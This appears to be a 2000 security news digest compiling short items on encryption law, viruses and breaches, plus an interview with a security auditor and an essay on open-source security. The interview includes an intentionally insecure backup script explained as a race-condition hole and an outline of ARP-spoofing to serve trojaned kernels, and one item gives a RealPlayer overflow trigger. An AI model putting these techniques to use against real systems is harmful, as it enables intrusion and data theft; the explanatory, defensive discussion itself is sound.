Thursday 6 April 2000 on 1:58 PM

Computer programs used to scramble electronic messages are protected by the First Amendment because those codes are a means of communication among programmers, a federal appeals court ruled Tuesday.

Link: Associated Press
http://www.worldnews.com/?action

Bad url

@HWA

176.0 [HNS] April 6: RELEASED AFTER CODE MACHINE THEFT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Thursday 6 April 2000 on 1:57 PM

A 50-year-old man has been released on police bail after being questioned by detectives investigating the disappearance of the Enigma encoding machine.

Link: BBC
http://news.bbc.co.uk/hi/english/uk/newsid_701000/701877.stm

Wednesday, 5 April, 2000, 12:53 GMT 13:53 UK

Man released after code machine theft

[Caption: Bletchley Park: Centre for wartime code-breaking effort]

A 50-year-old man has been released on police bail after being questioned by detectives investigating the disappearance of the Enigma encoding machine.

The man, from Bedfordshire, was arrested on Tuesday and released after questioning at Milton Keynes police station.

Police have mounted a massive search for the historic machine, which cracked the Nazi Enigma code during the Second World War.

It was stolen in broad daylight from a glass cabinet at the Bletchley Park museum on Saturday, where it was on display.

Police officers were preparing to trawl a lake on the estate and search the mansion.

Thames Valley Police spokesman John Brett said: "A search of the mansion and the grounds of Bletchley Park will start under the supervision of a police search adviser and a team of 10 police officers.

[Caption: The missing Enigma machine]

"There is a possibility that a Thames Valley Police underwater search unit may be used to search the lake in Bletchley Park.
"It could be hidden under the stairs in the mansion, there are lots of places it could be." Detectives think the thief could have abandoned the Enigma machine within the 50-acre grounds of the estate, or in one of the 70 rooms in the mansion. The museum in Milton Keynes, Buckinghamshire, was raided in full view of visitors during an open day on Saturday. The Enigma - one of only three in the world - is worth up to £100,000 and was used by the Germans to encrypt messages sent during the Second World War. Bletchley Park is believed to have shortened the war by cracking the code. Detectives were appealing for any visitors on Saturday who took pictures or video footage to contact police in the hope they might identify the thief. Reward offered Mr Brett urged whoever stole the machine not to be tempted to destroy the evidence in the light of massive publicity. He added: "If it's a prank that's gone wrong, don't destroy it because our main priority is getting it back." A £5,000 reward is being offered by BT, owners of part of the site in Milton Keynes since World War II. "It is a tragedy that the machine has been stolen," Alan White, director of BT's property division, said. @HWA 177.0 [HNS] April 6:CYBERPATROL BLOCK LIST ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Thursday 6 April 2000 on 1:36 PM Our affiliates at Security Watch wrote that a list of thousands of hosts, websites and Usenet groups blocked by Microsystems Software Inc.'s CyberPatrol software has been published on the web. Link: Security Watch http://www.securitywatch.com/scripts/news/list.asp?AID skull fucked url @HWA 178.0 [HNS] April 5:CRYPTO REGULATIONS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 5 April 2000 on 12:27 PM Privacy advocates won a preliminary victory when for the second time a federal appeals court questioned restrictions on data-scrambling encryption software. 
Link: Wired http://www.wired.com/news/politics/0,1283,35425,00.html Crypto Regs Challenged Again by Declan McCullagh 4:00 p.m. Apr. 4, 2000 PDT Privacy advocates won a preliminary victory when for the second time a federal appeals court questioned restrictions on data-scrambling encryption software. The Sixth Circuit Court of Appeals suggested Monday that President Clinton's restrictions on distributing encryption products might be unconstitutional. "Because computer source code is an expressive means for the exchange of information and ideas about computer programming, we hold that it is protected by the First Amendment," a three-judge panel said in a unanimous 17KB decision. That decision reversed a July 1998 ruling by a federal district court. And while the panel did not strike down the Clinton administration's regulations, it did refer the matter back to U.S. District Judge James Gwin for another hearing. Earlier Gwin had ruled the First Amendment did not apply. The Justice Department says source code is akin to instructions for a machine, and rules governing its distribution are necessary for national security reasons. Now that the appeals court has ruled source code is protected by the First Amendment, the government will have a much tougher time arguing it should have the power to imprison a law professor for posting a book on his website. Peter Junger, a professor at Case Western University School of Law, sued the federal government after it told him he needed a license to post a chapter of his Computers and the Law textbook online. The American Civil Liberties Union, which represents Junger, applauded the ruling. "This is a great day for programmers, computer scientists and all Americans who believe that privacy and intellectual freedom should be free from government control," said ACLU Legal Director Raymond Vasvari. In a separate case that also challenges the criminal penalties the U.S. 
government imposes for unauthorized encryption distribution, the 9th U.S. Circuit Court of Appeals in May 1999 ruled that encryption source code was speech protected by the First Amendment. "We conclude that the challenged regulations allow the government to restrain speech indefinitely with no clear criteria for review," the 9th Circuit panel said in its decision in a case brought by math professor Daniel Bernstein. But it's not clear what happens next in either the Junger or Bernstein cases. The Clinton administration relaxed the regulations in January, and the move is likely to delay both lawsuits for some time. In fact, the Commerce Department, which administers the regulations, says that Bernstein no longer has anything to worry about. "You ask for an advisory opinion in light of your concern that the new regulations 'continue to interfere with Professor Bernstein's planned scientific activities.' Your concerns are unfounded," a Commerce Department Bureau of Export Administration official wrote to Bernstein's lawyers in February. Bernstein asked in March for a rehearing by the district court to take into account the regulation changes. @HWA 179.0 [HNS] April 5:GFI AND NORMAN TEAM UP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 5 April 2000 on 12:24 PM GFI and Norman have teamed up to integrate the Norman Virus Engine with GFI's e-mail security gateway, Mail essentials. Link: ESJ http://www.esj.com/breaknewsdisp.asp?ID br0ked url @HWA 180.0 [HNS] April 5:MASTERCARD OFFER VIRUS REPAIR SERVICE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 5 April 2000 on 12:23 PM MasterCard has taken the unusual step of offering a free virus repair service as a key feature in its small business card package. 
Link: Computer Currents
http://www.currents.net/newstoday/00/04/05/news5.html

@HWA

181.0 [HNS] April 5: BUFFER OVERFLOWS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Wednesday 5 April 2000 on 3:12 AM

In a survey held amongst readers of the security/vulnerability report list "Bugtraq" a few months ago, approximately 2/3 of the respondents thought the so-called "buffer overflows" to be the dominating security problem. Read the new Default article which deals with buffer overflows.

Link: Default
http://net-security.org/default/articles/09/02.shtml

@HWA

182.0 [HNS] April 5: PIRACY
~~~~~~~~~~~~~~~~~~~~~

by LogError
Wednesday 5 April 2000 on 12:11 AM

Washington state, with an economy that has boomed along with Microsoft's, has launched a crackdown on state employees who illegally circulate pirated software on government computers.

Link: APB News
http://www.apbnews.com/newscenter/internetcrime/2000/04/04/software0404_01.html

@HWA

183.0 [HNS] April 5:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by LogError
Wednesday 5 April 2000 on 12:05 AM

Certicom's ECC2k-108 Elliptic Curve Discrete Logarithm challenge has been broken! This was the largest public calculation ever to use a complex parallel algorithm. $5,000 dollars in winnings will be donated to the Free Software Foundation.

Link: Slashdot
http://slashdot.org/article.pl?sid

@HWA

184.0 [HNS]: April 5:GROUP APPEALS DVD CRYPTO INJUNCTION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by LogError
Wednesday 5 April 2000 on 12:02 AM

Continuing its California courtroom battle against the Digital Video Disk industry over DVD encryption codes, the Electronic Frontier Foundation has appealed an injunction granted against more than 50 Web site operators in January.
Link: Computer User
http://www.currents.net/newstoday/00/04/04/news7.html

@HWA

185.0 [HNS] April 5: VIRUS BLOWS A HOLE IN NATO'S SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by LogError
Wednesday 5 April 2000 on 12:01 AM

The North Atlantic Treaty Organization has launched a full-scale investigation into how one of its top-secret documents ended up posted on the Internet. The Sunday Telegraph reports that an unknown virus is to blame for the posting of the nine-page document, detailing the alliance's rules of engagement in the southern Yugoslav province of Kosovo, on to the Net.

Link: Computer User
http://www.currents.net/newstoday/00/04/04/news3.html

@HWA

186.0 [HNS] April 4: FIGHT SPAM WITH SPAM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Tuesday 4 April 2000 on 8:40 AM

Cisco Systems is urging victims of spam to take the law into their own hands and deliver their own form of vengeance to combat unwanted e-mails. This was taken from booklet 'The Easy Guide to Network Security', which could be downloaded from their UK site.

Link: The Register
http://www.theregister.co.uk/000404-000001.html

@HWA

187.0 [HNS] April 4:REALPLAYER BUFFER OVERFLOW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Tuesday 4 April 2000 on 8:10 AM

There is a buffer overflow in the Win32 RealPlayer Basic client, versions 6 and 7. This appears to occur when >299 characters are entered as a 'location' to play, such as http://aaaaa..... with 300 a's. If it is embedded in an html page Internet Explorer also crashes.

Link: Bugware
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid954828462,32898,

@HWA

188.0 [HNS] May 31st:NO PROBLEMS?
~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Wednesday 31 May 2000 on 6:46 PM

Microsoft says there are no problems with its e-mail software, even as computer experts have come out in support of an Auckland software designer who says its e-mail programs are dangerously flawed.

Link: NZ Herald
http://www.nzherald.co.nz/storydisplay.cfm?storyID

@HWA

189.0 [HNS] May 31: MS SECURITY BULLETIN #38
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Wednesday 31 May 2000 on 6:41 PM

Microsoft has released a patch that eliminates a security vulnerability in Microsoft Windows Media Encoder, which ships as a component of the Windows Media Technologies. The vulnerability could allow a malicious user to interfere with a digital content provider's ability to supply real-time audio and video broadcasts.

Link: Read the advisory
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid959791139,28208,

@HWA

190.0 [HNS] May 31: BURGLAR ALARM CATCHES ATTACKERS ON THE NET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by LogError
Wednesday 31 May 2000 on 5:49 PM

The service gives European companies the opportunity to outsource network intrusion detection instead of relying on internal security experts. Defcom showed off its flagship European "alarm centre" in Stockholm Monday -- from which a company's network security can be remotely monitored - and said that similar centres are currently being tested in London and Berlin, and will be operational there after the summer.

Link: ZDNet UK
http://www.zdnet.co.uk/news/2000/21/ns-15659.html

@HWA

191.0 [HNS] May 31: SENATE EYES GUARD FOR INFO SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by LogError
Wednesday 31 May 2000 on 5:48 PM

The Senate this month urged the Pentagon to study how it might use the Army National Guard to make up for the shortage of computer programmers and information security specialists.
Link: IDG
http://www.idg.net/ic_184044_1794_9-10000.html

@HWA

192.0 [HNS] May 31: TURBOLINUX SECURITY ANNOUNCEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by LogError
Wednesday 31 May 2000 on 5:46 PM

Package: xlockmore-4.16 and earlier

The xlock program locks an X server until a valid password is entered. The command line option -mode provides a user with a mechanism to change the default display shown when the X server is locked. xlock is installed with privileges to obtain password information, although these are dropped as early as possible. An overflow in the -mode command line option allows a malicious attacker to reveal arbitrary portions of xlock's address space including the shadow password file.

Link: Linux Today
http://linuxtoday.com/news_story.php3?ltsn

@HWA

193.0 [HNS] May 31: NAI ON VBS FIREBURN WORM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Wednesday 31 May 2000 on 5:37 PM

This is a VBS mass-mailing worm that uses Microsoft Outlook and mIRC to propagate. This worm is a VBS program that is sent to all users in the victim's address book and is attached to an email with varying subject lines, depending on the language version of the host system which sent the message. This worm contains a date activated payload which disables the keyboard and mouse on June 20th.

Link: NAI advisory
http://vil.nai.com/villib/dispvirus.asp?virus_k

@HWA

194.0 [HNS] May 31: INTERNET GUARD DOG PRO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Wednesday 31 May 2000 on 5:35 PM

Last week McAfee Retail Software, a division of Network Associates, Inc., announced McAfee Internet Guard Dog Pro, an all-in-one solution containing a personal firewall and parental controls to keep children safe while online.
Link: Press Release
http://net-security.org/cgi-bin/press/fullnews.cgi?newsid959697420,11489,

@HWA

195.0 [HNS] May 31: FRANK VAN VLIET INTERVIEW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Wednesday 31 May 2000 on 5:34 PM

LinuxSecurity.com has an interview with Frank van Vliet aka {}, the author of AuditFile and the man who recently pointed out configuration errors on apache.org.

Link: LinuxSecurity.com
http://www.linuxsecurity.com/feature_stories/feature_story-47.html

Linux Security Interview with Frank van Vliet
By Benjamin D. Thomas
5/30/2000 16:20

Frank van Vliet is the author of AuditFile, many security advisories, and recently pointed out configuration errors on apache.org.

We thought our readers would be interested in an interview with Frank van Vliet because of the recent paper he and Peter van Dijk released outlining the steps they took to compromise apache.org. Their paper does not point out any new vulnerabilities, it merely shows how simple configuration errors can leave a system susceptible to attack. In this interview Frank explains how he audits a system's security, major pitfalls administrators fall into, and how he attempts to uncover bugs. We believe that everyone can learn something from this interview.

Note: Frank uses the alias {}

LinuxSecurity: When and how did you gain interest in security? How did you gain your security knowledge?

Frank: When I finally switched from Windows to Linux, I spent a lot of time studying the Linux kernel source. When I finished that one I knew C enough to start coding on my own. I started working on my first security project called Auditfile. A kernel patch making it possible to restrict file access per process or per binary. This enabled me to run my apache webserver only allowing it to read default libraries (/lib/*, /usr/lib/*), read its configuration files, htdocs (wwwroot) directory, and only allowing it to write to logfiles with no further access.
At the same time I took over control of the security focused group RooT66 http://root66.nl.eu.org and I joined ShellOracle http://www.shelloracle.org. I spent hours reading various texts and joined Buffer0verfl0w security http://b0f.freebsd.lublin.pl I also got involved with projects like SecNet http://irc.secnet.org (not finished when writing this). I have done some freelance security jobs for small webhosters.

LinuxSecurity: When attempting to audit a system's security, what procedure do you follow? Where do you begin? How do you normally gather information? What comes next?

Frank: My approach changes as I gain more knowledge. Currently when checking the security of a system, I start checking the file system (what files are suidroot or suidgroup, what files are accessible for what groups, what files are world writable, are there any files with nonpublic information world readable). Next, I try to find out what processes are running as root. Of course the suid root processes are but there are also crontabs or administrators around running binaries so I wrote some tools live monitoring the processes running as root. When having a list of binaries run as root, I start checking every binary. Are there any known security flaws in it? Are its configuration files and data files accessible by nonroot? If nothing and I am really in the mood and the binary isn't too big I would download the source of it (I really love open-source) and read it to see if I can find any bugs in it.

LinuxSecurity: What are some of the major pitfalls Linux Administrators fall into?

Frank: It is never enough to download all patches and updates and run latest versions of your software. The group Buffer0verfl0w Security I am in is constantly searching for new bugs in software. Most admins play with things themselves and forget permissions on files or other configuration faults.
These things can be like the following backup script:

    #!/bin/bash
    # Back up every home directory (insecure as written, see the text below)
    for file in /home/*
    do
        # strip the leading /home/ to get the archive name
        name=`echo $file | sed -e 's/\/home\///'`
        # the archive is created in the current directory with the default umask
        tar -czf $name.tar.gz $file
        mv $name.tar.gz /verysecuredirectory/backups
    done

Which means every home directory will be compressed into targz files in the local directory then they get moved to the /verysecuredirectory/backups. But because most umasks aren't set to make new files 600 and most of the times it makes new files world readable, an attacker can gain all directories in /home if he just scans most common directories the root is in for .tar.gz files and very fast copies most of it to his own directories before the scripts move it (most of the time this is while it is still compressing into that tar.gz file and it is already readable).

Besides those race condition bugs like the previous ones, there are also administrators that store backups in world readable. And there are always the 'can I trust my network' things. Man in the middle attacks are not very common but are very easy to perform, especially when at the same network segment as the box you attack (could be some other way more insecure box previously hacked). In worst case an attacker on the same segment could broadcast arp who-has packets with the ip of the nameserver the attacked box is using has the MAC address of my NIC. That would mean when the attacked box would try to access the nameserver, it will instead contact the box of the attacker and send its name resolving questions. Then the attacker can just reply normally except for the kernel.org domain and have those names resolve to the ip of the box of the attacker. Then have it set up just the same ftpserver as on any other ftp kernel.org box and have it search trojaned Linux kernels and then just wait for a new Linux kernel to be published.

LinuxSecurity: Have you exposed any other vulnerabilities, or written any programs related to security?
Frank: Well, I wrote auditfile (still working on a newer version, as always) I mentioned in the beginning of this interview that is at http://root66.nl.eu.org/karin/auditfile-1.00.tar.gz. I found a bug and wrote an exploit for bugzilla http://bugzilla.mozilla.org and working on some other exploits and tools at the moment.

LinuxSecurity: How do you normally approach finding security vulnerabilities and writing code to exploit them?

Frank: Every language has its own sets of common bugs the programs can have. For C/C++ these are mostly buffer overflows. The only way to find them is to check every buffer in the program and search for any functions done on that buffer and check everything if there is a possibility to exploit it. I wrote some perl scripts to automate a part of this task which I normally use to find the buffers, sizes of those buffers and possible insecure functions (like strcpy and sprintf) done on those buffers, saving me a lot of time finding normal overflows. The tricky ones require reading from line 1 to like $ (last line).

For perl it are most of the time system or open functions that can be used to execute commands (like system(finger $user) or open($user) where the attacker can set the $user variable). So I normally search for all open, system (system, exec, `, and so on) functions and check arguments to them. Also database functions can be insecure.

I know people sending random feeds to their sendmail daemon and catch crashes then backtrace to see what feed caused it and then work their way back from there to the bug. Perhaps someday when I am that desperate to find a bug in some high profile software I would do a thing like that, until then I just read and most of the time you also learn by reading.

LinuxSecurity: What do you feel is the most important step in keeping a network secure?

Frank: The integrity of the network can be spoiled if only one of the boxes on the network got compromised by a nontrusted person.
Most networks get compromised because only one insecure box was on the network. Administrators may want to consider an Intrusion Detection System to monitor all machines on a network. The most important step to keep a network secure is to keep all hosts secure, this can be done by restricting as much as possible from outside to the network (like only http connections to the httpserver and only ftp connections to the ftpserver and so on) and having an IDS monitoring network traffic.

LinuxSecurity: What do you think the most common Linux security vulnerability is? How would you recommend an administrator fix this?

Frank: The possibility of easy exploiting of buffer overflows. Most buffer overflows can be stopped by patches like the nonexecutable stack (http://www.openwall.com/linux and packetstorm to see my 2.3.99-pre5 version of it) patch for the Linux kernel and compiler addons like stackguard.

LinuxSecurity: Do you think open-source software has the potential for being more or less secure than closed-source software?

Frank: There are two sides to this story, if the same program was available in both open and close sourced version. They are insecure at the same rate. But because you get the source code of the open-source program it is very easy to search for bugs. Then two things happen. The bugs get reported and exploits are made for those bugs. This makes the open source program having less bugs than the same closed source program but also there are more exploits around and there will be more bugs to be found in the future. This doesn't say it is impossible to disassemble the closed source program and find the bugs in that one too. Then the same happens for the close source version but at a slower rate because the source is harder to get and to read (would be ASM instead of easy C or some other fancy language).
Open source software is more secure than closed source because good coders can use disassembling techniques on closed source programs to find vulnerabilities. I would rather have the open source version so it can be compiled with stackguard.

LinuxSecurity: What do you think motivates "black hats" to damage/destruct systems?

Frank: It is the kick of gaining access and power motivating the "black hats" to hack systems. The damage and destruct is most of the times done in 2 parts. One part is to make sure they keep their full access and so most binaries are Trojan and so on. This can be because they are mad at the company they just hacked (they wouldn't pay them for revealing the security bugs they exploited or some other in my opinion lame reason) or just because they really don't care and just want to show off (like the recent DDS attacks).

LinuxSecurity: How do you feel about the mass-media's portrayal of 'hacking'?

Frank: Most media focuses on the things done by stupid kids mass attacking big servers with DDS networks or doing other stupid things. This does take the heat off the real hackers. The real hackers that don't hack and don't want to be disturbed at their work of endless coding and tracing through programs. It was because Hardball and I wanted to make a statement about consideration of configuration. The media got us a little attention, we would still be unknown doing endless coding.

LinuxSecurity: What do you see is in the future for information security?

Frank: I would love to see administrators think twice before installing things on their boxes. Also, having kids on your company network is the last thing you want, especially when they try to trojan your ssh daemon and mess up making some boxes even unusable and forcing to full reinstall of everything because you don't know what was trojanned and what was not.

LinuxSecurity: We would like to take a moment to thank Frank for taking time out of his busy schedule to share some of his experiences with us.
If you have any questions regarding this interview, please feel free to drop us an email. As always, if you have any ideas for other interviews, or any suggestions, please let us know. We want to serve you!

@HWA

196.0 [HNS] May 31: MISSING FILES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Wednesday 31 May 2000 on 5:32 PM

Auckland software developer, Phil Saleh, who found a security flaw in MS Outlook that he believes could secretly unleash a "hell virus", says files on his discovery have been stolen from his computer.

Link: NZ Herald
http://www.nzherald.co.nz/storydisplay.cfm?storyID

Real story at this url was abducted by aliens.

@HWA

197.0 [HNS] May 31: THE MYTH OF OPEN SOURCE SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Wednesday 31 May 2000 on 5:32 PM

An author of the open source Mailman program explains why open source is not as secure as you might think - using security holes in his own code as an example.

Link: Developer.com
http://developer.earthweb.com/journal/techfocus/052600_security.html

May 26, 2000
The Myth of Open Source Security
by John Viega

An author of the open source Mailman program explains why open source is not as secure as you might think — using security holes in his own code as an example.

Open source software projects can be more secure than closed source projects. However, the very things that can make open source programs secure — the availability of the source code, and the fact that large numbers of users are available to look for and fix security holes — can also lull people into a false sense of security.

Many eyeballs

The core open source phenomenon responsible for making code secure is the "many eyeballs" effect. With lots of people scrutinizing a program's source code, bugs — and security problems — are more likely to be found.

Why do programmers look at source code? Mostly for their own benefit: they've found a piece of open source software useful, and they want to improve or change it for their own specific needs.
Sometimes too, source code attracts scrutiny just to make sure it meets certain needs, even when there's no intention of modifying it. Companies which require a high level of security, for example, might do a code review as part of a security audit. This could be done for any software product where the source is available, of course, regardless of whether it's open source or produced commercially.

Source code can also attract programmers' eyeballs simply for reasons of personal gain. Some people may explicitly wish to find security problems in the code. Perhaps they want to build a name for themselves in the security community. Maybe they're motivated by altruism or a belief that others should be aware of security holes. Earlier this month, for example, two hackers broke into the open source Apache Software Foundation Web site, posted a Microsoft logo on it, and then published an explanation of how an improperly configured Apache server allowed them access. Many others share information about security vulnerabilities in less intrusive ways, such as posting to discussions on the Bugtraq mailing list.

And, unfortunately, there will probably always be some people scrutinizing source code because they want an attack that no one else has — in which case, you're not likely to gain much from their eyeballs.

Eyes that look do not always see

With people motivated to look at the source code for any number of reasons, it's easy to assume that open source software is likely to have been carefully scrutinized, and that it's secure as a result. Unfortunately, that's not necessarily true.

Lots of things can discourage people from reviewing source code.
One obvious deterrent: if the code looks like a big tangled mess, you'll get fewer eyeballs on it. And as we discovered while writing Mailman, the GNU mailing list manager, anything that makes it harder for the average open source user to hack means fewer eyeballs. We wrote Mailman in Python, which is nowhere near as popular as C, and often heard from people who would have liked to help with the development, but did not want to have to learn Python to do it.

People using open source programs are most likely to look at the source code when they notice something they'd like to change. Unfortunately, that doesn't mean the program gets free security audits by people good at such things. It gets eyeballs looking at the parts of the code they want to change. Often, that's only a small part of the code.

What's more, programmers preoccupied with adding a feature generally aren't thinking much about security when they're looking at the code. And, unfortunately, software developers sometimes have a tendency to ignore security up front and try to bolt it on afterwards. Even worse, most developers don't necessarily know much about security. Many programmers know a bit about buffer overflows, and are probably aware of a handful of functions that should be avoided. But many of them don't understand buffer overflows enough to avoid problems beyond the handful of dangerous calls they know.

And when it comes to flaws other than buffer overflows, the problem gets worse. For example, it is common for developers to use cryptography, but misapply it in ways that destroy the security of a system, and it is also common for developers to add subtle information leaks to their programs accidentally. It's really common to use encryption that is too weak and can easily be broken. It's also common for people to exchange cryptography keys in a way that's actually insecure. People often try to hand roll their own protocols using common cryptographic primitives.
But cryptographic protocols are generally more complex than one would expect, and are easy to get wrong.

Far too trusting

So despite the conventional wisdom, the fact that many eyeballs are looking at a piece of software is not likely to make it more secure. It is likely, however, to make people believe that it is secure. The result is an open source community that is probably far too trusting when it comes to security.

Take the case of the open source mailing list manager Mailman, which I helped write. Mailman is in use running mailing lists at an impressive number of sites. For three years, until March 2000, Mailman had a handful of glaring security problems in code that I wrote before I knew much about security. An attacker could use these security holes to gain access to the operating system on Linux computers running the program.

These were not obscure bugs: anyone armed with the Unix command grep and an iota of security knowledge could have found them in seconds. Even though Mailman was downloaded and installed thousands of times during that time period, no one reported a thing. I finally realized there were problems as I started to learn more about security. Everyone using Mailman, apparently, assumed that someone else had done the proper security auditing, when, in fact, no one had.

And if three years seems like a long time for security holes to go undetected, consider the case of Kerberos, an Open Source security protocol for doing authentication. According to Ken Raeburn, one of the developers of the MIT Kerberos implementation, some of the buffer overflows recently found in that package have been there for over ten years.
The many eyeballs approach clearly failed for Mailman. And as open source programs are increasingly packaged and sold as products, users — particularly those who are not familiar with the open source world — may well assume that the vendor they are buying the product from has done some sort of security check on it. Until this week, for example, version 1.0 of Mailman, which contains these security holes, was included in Red Hat Professional Linux version 6.2. (If you're running a Mailman version earlier than 2.0 beta, allow me to suggest that you upgrade immediately. The latest version can be found on the Mailman Web site at http://www.list.org).

Security: tougher than it looks

Even if you get the right kind of people doing the right kinds of things, you may have problems that you never hear about. Security problems are often incredibly subtle, and may span large parts of a source tree. It is not uncommon to have two or three features spread throughout a program, none of which constitutes a security problem alone, but which can be used together to perform a security breach. For example, two buffer overflows recently found in Kerberos version 5 could only be exploited when used in conjunction with each other.

As a result, doing security reviews of source code tends to be complex and boring, since you generally have to look at a lot of code, and understand it pretty well. Even many experts don't like to do these kinds of reviews.

And even the experts can miss things. Consider the case of the popular open source FTP server wu-ftpd. In the past two years, several very subtle buffer overflow problems have been found in the code. Almost all of these problems had been in the code for years, despite the fact that the program had been examined many times by both hackers and security auditors. If any of them had discovered the problems, they didn't announce it publicly.
In fact, the wu-ftpd has been used as a case study for vulnerability detection techniques that never identified these problems as definite flaws. One tool was able to identify one of the problems as potentially exploitable, but researchers examined the code thoroughly for a couple of days, and came to the conclusion that there was no way that the problem identified by their tool could actually be exploited. Over a year later, they learned that they were wrong, when an expert audit finally did turn up the problem.

In code with any reasonable complexity, it can be very difficult to find bugs. The wu-ftpd is less than 8000 lines of code long, but it was easy for several bugs to remain hidden in that small space over long periods of time.

To compound the problem, even when people know about security holes, they may not get fixed, at least not right away. Even when identified, the security problems in Mailman took many months to fix, because security was not the core development team's most immediate concern. In fact, the team believes one problem still persists in the code, but only in a configuration that we suspect doesn't get used.

An army in my belly

The single most pernicious problem in computer security today is the buffer overflow. While the availability of source code has clearly reduced the number of buffer overflow problems in open source programs, according to several sources, including CERT, buffer overflows still account for at least a quarter of all security advisories, year after year.

Open source proponents sometimes claim that the "many eyeballs" phenomenon prevents Trojan horses from being introduced in open source software. The speed with which the TCP wrappers Trojan was discovered in early 1999 is sometimes cited as supporting evidence.
This too can lull the open source movement into a false sense of security, however, since the TCP wrappers Trojan is not a good example of a truly stealthy Trojan horse: the code was glaringly out of place and obviously put there for malicious purposes only. It was as if the original Trojan horse had been wheeled into Troy with a sign attached that said, "I've got an army in my belly!"

Well-crafted Trojans are quite different. They generally look like ordinary bugs with security implications, and are very subtle. Take, for example, wu-ftpd. Who is to say that one of the buffer overflows that have been found recently was not a Trojan horse introduced years ago when the distribution site was hacked?

The open source movement hasn't made the problem of buffer overflows go away. But eventually, newer programming languages may; unlike C, modern programming languages like Java or Python never have buffer overflow problems, because they do automatic bounds checking on array accesses. As with any technology, fixing the root of the problem is far more effective than any ad hoc solution.

Is closed source any more secure?

Critics of open source software might say that providing source code makes the job of the malicious attacker easier. If only a binary is available, the bar has been raised high enough to send most such people looking for lower-hanging fruit.

But as the many well-publicized security holes in commercial software make clear, attackers can find problems without the source code; it just takes longer. From a security point of view, the advantages of having the source code available for everyone to see far outweigh any benefit hackers may gain. There are many benefits of open source software unrelated to security. And the "many eyeballs" effect does have the potential to make open source software more secure than proprietary systems.
Currently, however, the benefits open source provides in terms of security are vastly overrated, because there isn't as much high-quality auditing as people believe, and because many security problems are much more difficult to find than people realize. Open source programs which appeal to a limited audience are particularly at risk, because of the smaller number of eyeballs looking at the code. But all open source software is vulnerable, and the open source movement can only benefit by paying more attention to security.

Resources

The Mailman web site. http://www.list.org/
The ITS4 security scanner for C code. http://www.rstcorp.com/its4
Software security for developers. http://www.ibm.com/developer/security
CERT web site. http://www.cert.org/

@HWA

198.0 [HNS] May 31: INFORMATION SHARING MECHANISM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Wednesday 31 May 2000 on 5:31 PM

The group, known as an "information sharing mechanism," will enable high technology companies to share data anonymously about software vulnerabilities and systems attacks.

Link: Financial Times
http://news.ft.com/ft/gx.cgi/ftc?pagename

Url was eaten by my dog

@HWA

199.0 [HNS] May 31: WAP RELATED DEFACEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Wednesday 31 May 2000 on 5:30 PM

It looks like probably the first site created for usage with WAP (Wireless Application Protocol) was defaced. WAP version of Italian Wappi web site (http://wap.wappi.com) was changed by De Meestervervalser. Just a note - It cannot be seen by a normal browser, but you could see it from Gelon through their emulator.

Link: Site seen with Nokia GSM
Link: Screenshot (21kb)
http://www.gelon.net/cgi-bin/wapalize.cgi?url http://wap.wappi.com
http://www.net-security.org/misc/wap2805.jpg

@HWA

200.0 [HNS] May 31: RUNNING A BSD-BASED FIREWALL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Wednesday 31 May 2000 on 5:30 PM

Internet security is currently a hot topic. Because of that, many smaller networks are turning toward firewalls to give them some protection. Many of these networks do not have the money to pay for a commercial firewall product, so they are moving to free Unix-based firewalls such as IP Firewall, IP Filter or IPChains.

Link: BSD Today
http://www.bsdtoday.com/2000/May/Features165.html

Running a BSD-based Firewall
FreeBSD vs. OpenBSD as a firewall platform.
By Jim O'Gorman

Introduction

Internet security is currently a hot topic. Because of that, many smaller networks are turning toward firewalls to give them some protection. Many of these networks do not have the money to pay for a commercial firewall product, so they are moving to free Unix-based firewalls such as IP Firewall, IP Filter or IPChains.

The company I work for was in a similar situation. I hope to give you some insight of why we chose the product we did, where we started, what we learned from the initial installation and also what we've changed to improve management of the network.

I am not going to explain firewall rule sets at all. That is too large of a topic. For that I would suggest getting the book "Firewalls and Internet Security" by Cheswick and Bellovin (ISBN 0201633574) and consulting the documentation of the firewall product you decide to go with.

Also, in this paper I will state what worked best for us at the time. What might work best for us in a year may be different. Just like what will work best for you now may be different from what we chose. Take the information in this paper, add it to information drawn elsewhere and form your own conclusion for what will be best for you.
